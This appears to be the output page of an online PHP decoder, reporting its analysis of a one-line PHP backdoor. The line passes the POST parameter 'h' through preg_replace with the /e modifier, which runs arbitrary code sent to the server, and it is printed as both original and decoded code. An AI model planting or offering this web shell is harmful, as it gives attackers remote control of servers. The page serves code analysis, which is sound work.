Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>..
Decoded Output download
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
Did this file decode correctly?
Original Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
Function Calls
preg_replace | 1 |
Stats
MD5 | baa4c6ecdad523c2dac2bb990a8c0bff |
Eval Count | 1 |
Decode Time | 117 ms |